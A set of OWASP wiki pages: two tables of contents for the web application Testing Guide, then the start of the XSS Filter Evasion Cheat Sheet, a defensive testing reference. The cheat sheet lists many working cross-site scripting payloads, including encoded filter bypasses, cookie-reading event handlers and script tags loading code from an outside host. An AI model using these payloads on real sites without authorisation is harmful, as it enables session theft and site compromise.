[[Testing for SSI Injection (OWASP-DV-009)|4.8.10 Testing for SSI Injection (OTG-INPVAL-010)]] formerly "Testing for SSI Injection (OWASP-DV-009)"

[[Testing for XPath Injection (OWASP-DV-010)|4.8.11 Testing for XPath Injection (OTG-INPVAL-011)]] formerly "Testing for XPath Injection (OWASP-DV-010)"

[[Testing for IMAP/SMTP Injection (OWASP-DV-011)|4.8.12 IMAP/SMTP Injection (OTG-INPVAL-012)]] formerly "IMAP/SMTP Injection (OWASP-DV-011)"

[[Testing for Code Injection (OWASP-DV-012)|4.8.13 Testing for Code Injection (OTG-INPVAL-013)]] formerly "Testing for Code Injection (OWASP-DV-012)"

[[Testing for Local File Inclusion|4.8.13.1 Testing for Local File Inclusion]] [Alexander Antukh]

[[Testing for Remote File Inclusion|4.8.13.2 Testing for Remote File Inclusion]] [Alexander Antukh]

[[Testing for Command Injection (OWASP-DV-013)|4.8.14 Testing for Command Injection (OTG-INPVAL-014)]] formerly "Testing for Command Injection (OWASP-DV-013)"

[[Testing for Buffer Overflow (OWASP-DV-014)|4.8.15 Testing for Buffer overflow (OTG-INPVAL-015)]] formerly "Testing for Buffer overflow (OWASP-DV-014)"

[[Testing for Heap Overflow|4.8.15.1 Testing for Heap overflow]]

[[Testing for Stack Overflow|4.8.15.2 Testing for Stack overflow]]

[[Testing for Format String|4.8.15.3 Testing for Format string]]

[[Testing for Incubated Vulnerability (OWASP-DV-015)|4.8.16 Testing for incubated vulnerabilities (OTG-INPVAL-016)]] formerly "Testing for incubated vulnerabilities (OWASP-DV-015)"

[[Testing for HTTP Splitting/Smuggling (OWASP-DV-016)|4.8.17 Testing for HTTP Splitting/Smuggling (OTG-INPVAL-017) ]] formerly "Testing for HTTP Splitting/Smuggling (OWASP-DV-016)" [Juan Galiana]

[[Error Handling|'''4.9 Error Handling''']]

[[Testing for Error Code (OWASP-IG-006)|4.9.1 Analysis of Error Codes (OTG-ERR-001)]] formerly "Analysis of Error Codes (OWASP-IG-006)"

[[Testing for Stack Traces (OWASP-IG-XXX)|4.9.2 Analysis of Stack Traces (OTG-ERR-002)]] formerly "Analysis of Stack Traces"

[[Cryptography|'''4.10 Cryptography''']]

[[Testing for Insecure encryption usage (OWASP-EN-001)| 4.10.1 Testing for Insecure encryption usage (OTG-CRYPST-001)]] formerly "Testing for Insecure encryption usage (OWASP-EN-001)"

[[Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection (OWASP-EN-002)| 4.10.2 Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection (OTG-CRYPST-002)]] formerly "Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection (OWASP-EN-002)"

[[Testing for Padding Oracle (OWASP-EN-003)| 4.10.3 Testing for Padding Oracle (OTG-CRYPST-003)]] formerly "Testing for Padding Oracle (OWASP-EN-003)"

[[Testing for Cacheable HTTPS Response (OTG-CRYPST-004)| 4.10.4 Testing for Cacheable HTTPS Response (OTG-CRYPST-004)]]

[[Test Cache Directives (OTG-CRYPST-005)|4.10.5 Test Cache Directives (OTG-CRYPST-005)]]

[[Testing for Insecure Cryptographic Storage (OTG-CRYPST-006)|4.10.6 Testing for Insecure Cryptographic Storage (OTG-CRYPST-006)]]

[[Testing for Sensitive information sent via unencrypted channels (OTG-CRYPST-007)|4.10.7 Testing for Sensitive information sent via unencrypted channels (OTG-CRYPST-007)]]

[[Test Cryptographic Key Management (OTG-CRYPST-008)|4.10.8 Test Cryptographic Key Management (OTG-CRYPST-008)]]

[[Logging|'''4.11 Logging''']] Not convinced Logging should be included as it requires access to logs to test

[[Test time synchronisation (OTG-LOG-001)|4.11.1 Test time synchronisation (OTG-LOG-001) ]] formerly "Incorrect time"

[[Test user-viewable log of authentication events (OTG-LOG-002)|4.11.2 Test user-viewable log of authentication events (OTG-LOG-002)]]

[[Testing for business logic (OWASP-BL-001)|'''4.12 Business Logic Testing (OWASP-BL-001)''']] [To review--> David Fern]
Business Logic<br>

[[Test business logic data validation (OTG-BUSLOGIC-001)|4.12.1 Test business logic data validation (OTG-BUSLOGIC-001)]] [New!] NOTE MAT: to discuss this section

[[Test Ability to forge requests (OTG-BUSLOGIC-002)|4.12.2 Test Ability to forge requests (OTG-BUSLOGIC-002)]] [New!]

[[Test integrity checks (OTG-BUSLOGIC-003)|4.12.3 Test integrity checks (OTG-BUSLOGIC-003)]] (e.g. overwriting updates) [New!]

[[Test tamper evidence (OTG-BUSLOGIC-004)|4.12.4 Test tamper evidence (OTG-BUSLOGIC-004)]] [New!]

[[Test excessive rate (speed) of use limits (OTG-BUSLOGIC-005)|4.12.5 Test excessive rate (speed) of use limits (OTG-BUSLOGIC-005)]] [New!]

[[Test size of request limits (OTG-BUSLOGIC-006)|4.12.6 Test size of request limits (OTG-BUSLOGIC-006)]] [New!]

[[Test number of times a function can be used limits (OTG-BUSLOGIC-007)|4.12.7 Test number of times a function can be used limits (OTG-BUSLOGIC-002)]] [New!]

[[Test bypass of correct sequence (OTG-BUSLOGIC-008)|4.12.8 Test bypass of correct sequence (OTG-BUSLOGIC-008)]] [New!]

[[Test self-hosted payment cardholder data processing (OTG-BUSLOGIC-009)|4.12.9 Test self-hosted payment cardholder data processing (OTG-BUSLOGIC-009)]] [New!]

[[Test security incident reporting information (OTG-BUSLOGIC-010)|4.12.10 Test security incident reporting information (OTG-BUSLOGIC-010)]] [New!]

[[Test defenses against application mis-use (OTG-BUSLOGIC-011)|4.12.11 Test defenses against application mis-use (OTG-BUSLOGIC-011)]] [New!]

[[Denial of Service|'''4.13 Denial of Service''']]

[[Test Regular expression DoS (OTG-DOS-001)| 4.13.1 Test Regular expression DoS (OTG-DOS-001)]] [New!] note: to understand better<br>

[[Test XML DoS (OTG-DOS-002)| 4.13.2 Test XML DoS (OTG-DOS-002)]] [New! - Andrew Muller]

[[Testing for Captcha (OWASP-AT-012)|4.13.3 Testing for CAPTCHA (OTG-DOS-003)]] formerly "Testing for CAPTCHA (OWASP-AT-012)"

[[Web Service (XML Interpreter)|'''4.14 Web Service Testing''']] [Tom Eston]

[[Scoping a Web Service Test (OWASP-WS-001)|4.14.1 Scoping a Web Service Test (OTG-WEBSVC-001)]] formerly "Scoping a Web Service Test (OWASP-WS-001)"

[[WS Information Gathering (OWASP-WS-002)|4.14.2 WS Information Gathering (OTG-WEBSVC-002)]] formerly "WS Information Gathering (OWASP-WS-002)"

[[WS Authentication Testing (OWASP-WS-003)|4.14.3 WS Authentication Testing (OTG-WEBSVC-003)]] formerly "WS Authentication Testing (OWASP-WS-003)"

[[WS Management Interface Testing (OWASP-WS-004)|4.14.4 WS Management Interface Testing (OTG-WEBSVC-004)]] formerly "WS Management Interface Testing (OWASP-WS-004)"

[[Weak XML Structure Testing (OWASP-WS-005)|4.14.5 Weak XML Structure Testing (OTG-WEBSVC-005)]] formerly "Weak XML Structure Testing (OWASP-WS-005)"

[[XML Content-Level Testing (OWASP-WS-006)|4.14.6 XML Content-Level Testing (OTG-WEBSVC-006)]] formerly "XML Content-Level Testing (OWASP-WS-006)"

[[WS HTTP GET Parameters/REST Testing (OWASP-WS-007)|4.14.7 WS HTTP GET Parameters/REST Testing (OTG-WEBSVC-007)]] formerly "WS HTTP GET Parameters/REST Testing (OWASP-WS-007)"

[[WS Naughty SOAP Attachment Testing (OWASP-WS-008)|4.14.8 WS Naughty SOAP Attachment Testing (OTG-WEBSVC-008)]] formerly "WS Naughty SOAP Attachment Testing (OWASP-WS-008)"

[[WS Replay/MiTM Testing (OWASP-WS-009)|4.14.9 WS Replay/MiTM Testing (OTG-WEBSVC-009)]] formerly "WS Replay/MiTM Testing (OWASP-WS-009)"

[[WS BEPL Testing (OWASP-WS-010)|4.14.10 WS BEPL Testing (OTG-WEBSVC-010)]] formerly "WS BEPL Testing (OWASP-WS-010)"

[[Client Side Testing|'''4.15 Client Side Testing''']] [New!]

[[Testing for DOM-based Cross site scripting (OWASP-DV-003)|4.15.1 Testing for DOM based Cross Site Scripting (OTG-CLIENT-001)]] formerly "Testing for DOM based Cross Site Scripting (OWASP-CS-001)" [Stefano Di Paola]

[[Testing Cross Origin Resource Sharing (OWASP CS-002)|4.15.2 Testing Cross Origin Resource Sharing (OTG-CLIENT-002)]] formerly "Testing for HTML5 (OWASP CS-002)" [Juan Galiana]

[[Testing for Cross site flashing (OWASP-DV-004)|4.15.3 Testing for Cross Site Flashing (OTG-CLIENT-003)]] formerly "Testing for Cross Site Flashing (OWASP-CS-003)"

[[Testing for Clickjacking (OWASP-CS-004)|4.15.4 Testing for Clickjacking (OTG-CLIENT-004)]] formerly "Testing for Clickjacking (OWASP-CS-004)" [Davide Danelon]

[[Testing WebSockets (OTG-CLIENT-005)|4.15.5 Testing WebSockets (OTG-CLIENT-005)]] [Ryan Dewhurst]

[[Testing Web Messaging (OWASP CS-006)|4.15.6 Testing Web Messaging (OTG-CLIENT-006)]] [Juan Galiana]

[[Testing Local Storage (OWASP CS-007)|4.15.7 Testing Local Storage (OTG-CLIENT-007)]] [Juan Galiana]

[[Testing Sandboxed Iframes (OWASP CS-008)|4.15.8 Testing Sandboxed Iframes (OTG-CLIENT-008)]] [Juan Galiana]

==[[Writing Reports: value the real risk |5. Writing Reports: value the real risk ]]==

[[How to value the real risk |5.1 How to value the real risk]] [To review--> Amro AlOlaqi]

[[How to write the report of the testing |5.2 How to write the report of the testing]] [To review--> Amro AlOlaqi]

==[[Appendix A: Testing Tools |Appendix A: Testing Tools ]]==

* Black Box Testing Tools [To review--> Amro AlOlaqi]

==[[OWASP Testing Guide Appendix B: Suggested Reading | Appendix B: Suggested Reading]]==
* Whitepapers [To review--> David Fern]
* Books [To review--> David Fern]
* Useful Websites [To review--> David Fern]

==[[OWASP Testing Guide Appendix C: Fuzz Vectors | Appendix C: Fuzz Vectors]]==

* Fuzz Categories [To review--> Amro AlOlaqi]

==[[OWASP Testing Guide Appendix D: Encoded Injection | Appendix D: Encoded Injection]]==

[To review--> Amro AlOlaqi]

----

[[Category:OWASP Testing Project]]

OWASP Testing Guide v3 Table of Contents

2013-09-17T22:59:03Z

Glenn 'devalias' Grant: Add 'OWASP Breakers' template tag

{{OWASP Breakers}}
__NOTOC__

This is the table of content of the New Testing Guide v3.<br>
You can download the stable version [http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf here] <br>

Back to the OWASP Testing Guide Project:
http://www.owasp.org/index.php/OWASP_Testing_Project

Updated: 2nd November 2008

'''T A B L E o f C O N T E N T S'''
----

==[[Testing Guide Foreword|Foreword by Eoin Keary - Global Board]]==

==[[Testing Guide Frontispiece |1. Frontispiece]]==

'''[[Testing Guide Frontispiece|1.1 About the OWASP Testing Guide Project]]'''

'''[[About The Open Web Application Security Project|1.2 About The Open Web Application Security Project]]'''

==[[Testing Guide Introduction|2. Introduction]]==

'''2.1 The OWASP Testing Project'''

'''2.2 Principles of Testing'''

'''2.3 Testing Techniques Explained'''

2.4 [https://www.owasp.org/index.php/Testing_Guide_Introduction#Security_Requirements_Test_Derivation Security requirements test derivation],[https://www.owasp.org/index.php/Testing_Guide_Introduction#Functional_and_Non_Functional_Test_Requirements functional and non functional test requirements], and [https://www.owasp.org/index.php/Testing_Guide_Introduction#Test_Cases_Through_Use_and_Misuse_Cases test cases through use and misuse cases]

2.4.1 [https://www.owasp.org/index.php/Testing_Guide_Introduction#Security_Tests_Integrated_in_Developers_and_Testers_Workflow Security tests integrated in developers and testers workflows]

2.4.2 [https://www.owasp.org/index.php/Testing_Guide_Introduction#Developers.27_Security_Tests Developers' security tests: unit tests and component level tests]

2.4.3 [https://www.owasp.org/index.php/Testing_Guide_Introduction#Functional_Testers.27_Security_Tests Functional testers' security tests: integrated system tests, tests in UAT, and production environment]

2.5 [https://www.owasp.org/index.php/Testing_Guide_Introduction#Security_Test_Data_Analysis_and_Reporting Security test data analysis and reporting: root cause identification and business/role case test data reporting]

==[[The OWASP Testing Framework|3. The OWASP Testing Framework]]==

'''3.1. Overview'''

'''3.2. Phase 1: Before Development Begins '''

'''3.3. Phase 2: During Definition and Design'''

'''3.4. Phase 3: During Development'''

'''3.5. Phase 4: During Deployment'''

'''3.6. Phase 5: Maintenance and Operations'''

'''3.7. A Typical SDLC Testing Workflow '''

==[[Web Application Penetration Testing |4. Web Application Penetration Testing ]]==

[[Testing: Introduction and objectives|'''4.1 Introduction and Objectives''']]

[[Testing Checklist| 4.1.1 Testing Checklist]]

[[Testing: Information Gathering|'''4.2 Information Gathering''']]

[[Testing: Spiders, Robots, and Crawlers (OWASP-IG-001)|4.2.1 Spiders, Robots and Crawlers (OWASP-IG-001)]]

[[Testing: Search engine discovery/reconnaissance (OWASP-IG-002)|4.2.2 Search Engine Discovery/Reconnaissance (OWASP-IG-002)]]

[[Testing: Identify application entry points (OWASP-IG-003)|4.2.3 Identify application entry points (OWASP-IG-003)]]

[[Testing for Web Application Fingerprint (OWASP-IG-004)|4.2.4 Testing for Web Application Fingerprint (OWASP-IG-004)]]

[[Testing for Application Discovery (OWASP-IG-005)|4.2.5 Application Discovery (OWASP-IG-005)]]

[[Testing for Error Code (OWASP-IG-006)|4.2.6 Analysis of Error Codes (OWASP-IG-006)]]

[[Testing for configuration management|'''4.3 Configuration Management Testing''']]

[[Testing for SSL-TLS (OWASP-CM-001)| 4.3.1 SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) (OWASP-CM-001)]]<br>

[[Testing for DB Listener (OWASP-CM-002)|4.3.2 DB Listener Testing (OWASP-CM-002)]]

[[Testing for infrastructure configuration management (OWASP-CM-003)|4.3.3 Infrastructure Configuration Management Testing (OWASP-CM-003)]]

[[Testing for application configuration management (OWASP-CM-004)|4.3.4 Application Configuration Management Testing (OWASP-CM-004)]]

[[Testing for file extensions handling (OWASP-CM-005)|4.3.5 Testing for File Extensions Handling (OWASP-CM-005)]]

[[Testing for Old, Backup and Unreferenced Files (OWASP-CM-006)|4.3.6 Old, Backup and Unreferenced Files (OWASP-CM-006) ]]

[[Testing for Admin Interfaces (OWASP-CM-007)|4.3.7 Infrastructure and Application Admin Interfaces (OWASP-CM-007)]]

[[Testing for HTTP Methods and XST (OWASP-CM-008)|4.3.8 Testing for HTTP Methods and Cross Site Tracing (XST) (OWASP-CM-008)]]

[[Testing for authentication|'''4.4 Authentication Testing''']]

[[Testing for credentials transport (OWASP-AT-001)|4.4.1 Credentials transport over an encrypted channel (OWASP-AT-001)]]

[[Testing for user enumeration (OWASP-AT-002)|4.4.2 Testing for user enumeration (OWASP-AT-002)]]

[[Testing for Default or Guessable User Account (OWASP-AT-003)|4.4.3 Testing for Guessable (Dictionary) User Account (OWASP-AT-003)]]

[[Testing for Brute Force (OWASP-AT-004)|4.4.4 Brute Force Testing (OWASP-AT-004)]]

[[Testing for Bypassing Authentication Schema (OWASP-AT-005)|4.4.5 Testing for bypassing authentication schema (OWASP-AT-005)]]

[[Testing for Vulnerable Remember Password and Pwd Reset (OWASP-AT-006)|4.4.6 Testing for vulnerable remember
password and pwd reset (OWASP-AT-006)]]

[[Testing for Logout and Browser Cache Management (OWASP-AT-007)|4.4.7 Testing for Logout and Browser Cache Management (OWASP-AT-007)]]

[[Testing for Captcha (OWASP-AT-008)|4.4.8 Testing for CAPTCHA (OWASP-AT-008)]]

[[Testing Multiple Factors Authentication (OWASP-AT-009)|4.4.9 Testing Multiple Factors Authentication (OWASP-AT-009)]]

[[Testing for Race Conditions (OWASP-AT-010)|4.4.10 Testing for Race Conditions (OWASP-AT-010)]]

[[Testing for Session Management|'''4.5 Session Management Testing''']]

[[Testing for Session_Management_Schema (OWASP-SM-001)|4.5.1 Testing for Session Management Schema (OWASP-SM-001)]]

[[Testing for cookies attributes (OWASP-SM-002)|4.5.2 Testing for Cookies attributes (OWASP-SM-002)]]

[[Testing for Session Fixation (OWASP-SM-003)|4.5.3 Testing for Session Fixation (OWASP-SM-003)]]

[[Testing for Exposed Session Variables (OWASP-SM-004)|4.5.4 Testing for Exposed Session Variables (OWASP-SM-004)]]

[[Testing for CSRF (OWASP-SM-005)|4.5.5 Testing for Cross Site Request Forgery (CSRF) (OWASP-SM-005)]]

[[Testing for Authorization|'''4.6 Authorization Testing''']]

[[Testing for Path Traversal (OWASP-AZ-001)|4.6.1 Testing for path traversal (OWASP-AZ-001)]]

[[Testing for Bypassing Authorization Schema (OWASP-AZ-002)|4.6.2 Testing for bypassing authorization schema (OWASP-AZ-002)]]

[[Testing for Privilege escalation (OWASP-AZ-003)|4.6.3 Testing for Privilege Escalation (OWASP-AZ-003)]]

[[Testing for business logic (OWASP-BL-001)|'''4.7 Business Logic Testing (OWASP-BL-001)''']]

[[Testing for Data Validation|'''4.8 Data Validation Testing''']]

[[Testing for Reflected Cross site scripting (OWASP-DV-001) |4.8.1 Testing for Reflected Cross Site Scripting (OWASP-DV-001) ]]

[[Testing for Stored Cross site scripting (OWASP-DV-002) |4.8.2 Testing for Stored Cross Site Scripting (OWASP-DV-002) ]]

[[Testing for DOM-based Cross site scripting (OWASP-DV-003)|4.8.3 Testing for DOM based Cross Site Scripting (OWASP-DV-003)]]

[[Testing for Cross site flashing (OWASP-DV-004)|4.8.4 Testing for Cross Site Flashing (OWASP-DV-004)]]

[[Testing for SQL Injection (OWASP-DV-005)| 4.8.5 Testing for SQL Injection (OWASP-DV-005)]]

[[Testing for Oracle|4.8.5.1 Oracle Testing]]

[[Testing for MySQL|4.8.5.2 MySQL Testing]]

[[Testing for SQL Server|4.8.5.3 SQL Server Testing]]

[[Testing for MS Access |4.8.5.4 MS Access Testing]]

[[OWASP_Backend_Security_Project_Testing_PostgreSQL|4.8.5.5 Testing PostgreSQL (from OWASP BSP) ]]

[[Testing for LDAP Injection (OWASP-DV-006)|4.8.6 Testing for LDAP Injection (OWASP-DV-006)]]

[[Testing for ORM Injection (OWASP-DV-007)|4.8.7 Testing for ORM Injection (OWASP-DV-007)]]

[[Testing for XML Injection (OWASP-DV-008)|4.8.8 Testing for XML Injection (OWASP-DV-008)]]

[[Testing for SSI Injection (OWASP-DV-009)|4.8.9 Testing for SSI Injection (OWASP-DV-009)]]

[[Testing for XPath Injection (OWASP-DV-010)|4.8.10 Testing for XPath Injection (OWASP-DV-010)]]

[[Testing for IMAP/SMTP Injection (OWASP-DV-011)|4.8.11 IMAP/SMTP Injection (OWASP-DV-011)]]

[[Testing for Code Injection (OWASP-DV-012)|4.8.12 Testing for Code Injection (OWASP-DV-012)]]

[[Testing for Command Injection (OWASP-DV-013)|4.8.13 Testing for Command Injection (OWASP-DV-013)]]

[[Testing for Buffer Overflow (OWASP-DV-014)|4.8.14 Testing for Buffer overflow (OWASP-DV-014)]]

[[Testing for Heap Overflow|4.8.14.1 Testing for Heap overflow]]

[[Testing for Stack Overflow|4.8.14.2 Testing for Stack overflow]]

[[Testing for Format String|4.8.14.3 Testing for Format string]]

[[Testing for Incubated Vulnerability (OWASP-DV-015)|4.8.15 Testing for incubated vulnerabilities (OWASP-DV-015)]]

[[Testing for HTTP Splitting/Smuggling (OWASP-DV-016)|4.8.16 Testing for HTTP Splitting/Smuggling (OWASP-DV-016) ]]

[[Testing for Denial of Service|'''4.9 Testing for Denial of Service''']]

[[Testing for SQL Wildcard Attacks (OWASP-DS-001)|4.9.1 Testing for SQL Wildcard Attacks (OWASP-DS-001)]]

[[Testing for DoS Locking Customer Accounts (OWASP-DS-002)|4.9.2 Testing for DoS Locking Customer Accounts (OWASP-DS-002)]]

[[Testing for DoS Buffer Overflows (OWASP-DS-003)|4.9.3 Testing for DoS Buffer Overflows (OWASP-DS-003)]]

[[Testing for DoS User Specified Object Allocation (OWASP-DS-004)|4.9.4 Testing for DoS User Specified Object Allocation (OWASP-DS-004)]]

[[Testing for User Input as a Loop Counter (OWASP-DS-005)|4.9.5 Testing for User Input as a Loop Counter (OWASP-DS-005)]]

[[Testing for Writing User Provided Data to Disk (OWASP-DS-006)|4.9.6 Testing for Writing User Provided Data to Disk (OWASP-DS-006)]]

[[Testing for DoS Failure to Release Resources (OWASP-DS-007)|4.9.7 Testing for DoS Failure to Release Resources (OWASP-DS-007)]]

[[Testing for Storing too Much Data in Session (OWASP-DS-008)|4.9.8 Testing for Storing too Much Data in Session (OWASP-DS-008)]]

[[Testing for Web Services|'''4.10 Web Services Testing''']]

[[Testing: WS Information Gathering (OWASP-WS-001)|4.10.1 WS Information Gathering (OWASP-WS-001)]]

[[Testing WSDL (OWASP-WS-002)|4.10.2 Testing WSDL (OWASP-WS-002)]]

[[Testing for XML Structural (OWASP-WS-003)|4.10.3 XML Structural Testing (OWASP-WS-003) ]]

[[Testing for XML Content-Level (OWASP-WS-004)|4.10.4 XML Content-level Testing (OWASP-WS-004)]]

[[Testing for WS HTTP GET parameters/REST attacks (OWASP-WS-005)|4.10.5 HTTP GET parameters/REST Testing (OWASP-WS-005) ]]

[[Testing for Naughty SOAP Attachments (OWASP-WS-006)|4.10.6 Naughty SOAP attachments (OWASP-WS-006) ]]

[[Testing for WS Replay (OWASP-WS-007)|4.10.7 Replay Testing (OWASP-WS-007) ]]

[[Testing_for_AJAX:_introduction|'''4.11 AJAX Testing''']]

[[Testing for AJAX Vulnerabilities (OWASP-AJ-001)|4.11.1 AJAX Vulnerabilities (OWASP-AJ-001)]]

[[Testing for AJAX (OWASP-AJ-002)|4.11.2 How to test AJAX (OWASP-AJ-002)]]

==[[Writing Reports: value the real risk |5. Writing Reports: value the real risk ]]==

[[How to value the real risk |5.1 How to value the real risk]]

[[How to write the report of the testing |5.2 How to write the report of the testing]]

==[[Appendix A: Testing Tools |Appendix A: Testing Tools ]]==

* Black Box Testing Tools
* Source Code Analyzers
* Other Tools

==[[OWASP Testing Guide Appendix B: Suggested Reading | Appendix B: Suggested Reading]]==
* Whitepapers
* Books
* Useful Websites

==[[OWASP Testing Guide Appendix C: Fuzz Vectors | Appendix C: Fuzz Vectors]]==

* Fuzz Categories
** Recursive fuzzing
** Replasive fuzzing
* Cross Site Scripting (XSS)
* Buffer Overflows and Format String Errors
** Buffer Overflows (BFO)
** Format String Errors (FSE)
** Integer Overflows (INT)
* SQL Injection
** Passive SQL Injection (SQP)
** Active SQL Injection (SQI)
* LDAP Injection
* XPATH Injection

==[[OWASP Testing Guide Appendix D: Encoded Injection | Appendix D: Encoded Injection]]==

----

[[Category:OWASP Testing Project]]

XSS Filter Evasion Cheat Sheet

2013-09-17T22:57:41Z

Glenn 'devalias' Grant: Add 'OWASP Breakers' template tag

{{OWASP Breakers}}

= Introduction =

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS Cheat Sheet, which was at: http://ha.ckers.org/xss.html. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention Cheat Sheet, the [[XSS (Cross Site Scripting) Prevention Cheat Sheet]], was inspired by RSnake's XSS Cheat Sheet, so we can thank him for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack cheat sheet, and so the [[Cheat_Sheets | OWASP Cheat Sheet Series]] was born.

= Tests =

This cheat sheet is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion.

Please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the scripts.

== XSS Locator ==
Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this [http://ha.ckers.org/xsscalc.html URL encoding calculator] to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

== XSS locator 2 ==
If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS verses &lt;XSS to see if it is vulnerable:

'';!--"<XSS>=&{()}

== No Filter Evasion ==
This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

== Image XSS using the JavaScript directive ==
Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:

<IMG SRC="javascript:alert('XSS');">

== No quotes and no semicolon ==

<IMG SRC=javascript:alert('XSS')>

== Case insensitive XSS attack vector ==

<IMG SRC=JaVaScRiPt:alert('XSS')>

== HTML entities ==
The semicolons are required for this to work:

<IMG SRC=javascript:alert("XSS")>

== Grave accent obfuscation ==
If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents:
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

== Malformed A tags ==
Skip the HREF attribute and get to the meat of the XXS...
Submitted by David Cross ~ Verified on Chrome

<nowiki><a onmouseover="alert(document.cookie)">xxs link</a></nowiki>

or
Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

<nowiki><a onmouseover=alert(document.cookie)>xxs link</a></nowiki>

== Malformed IMG tags ==
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

== fromCharCode ==
if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

== Default SRC tag to get past filters that check SRC domain ==
This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here.
Submitted by David Cross.

<IMG SRC=# onmouseover="alert('xxs')">

== Default SRC tag by leaving it empty ==

<IMG SRC= onmouseover="alert('xxs')">

== Default SRC tag by leaving it out entirely ==

<IMG onmouseover="alert('xxs')">

== Decimal HTML character references ==
all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS [http://ha.ckers.org/xsscalc.html Calculator] for more information:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

== Decimal HTML character references without trailing semicolons ==
This is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

== Hexadecimal HTML character references without trailing semicolons ==
This is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). Use the XSS [http://ha.ckers.org/xsscalc.html calculator] for more information:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

== Embedded tab ==
Used to break up the cross site scripting attack:

<IMG SRC="jav	ascript:alert('XSS');">

== Embedded Encoded tab ==
Use this one to break up XSS :
<IMG SRC="jav&#x09;ascript:alert('XSS');">

== Embedded newline to break up XSS ==
Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:

<nowiki><IMG SRC="jav&#x0A;ascript:alert('XSS');"></nowiki>

== Embedded carriage return to break up XSS ==
(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<nowiki><IMG SRC="jav&#x0D;ascript:alert('XSS');"></nowiki>

== Null breaks up JavaScript directive ==
Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00is much more useful and helped me bypass certain real world filters with a variation on this example:

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

== Spaces and meta chars before the JavaScript in images for XSS ==
This is useful if the pattern match doesn't take into account spaces in the word "javascript:" -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal:

<IMG SRC="  javascript:alert('XSS');">

== Non-alpha-non-digit XSS ==
The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace.
For example "<SCRIPT\s" != "<SCRIPT/XSS\s":

<nowiki><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

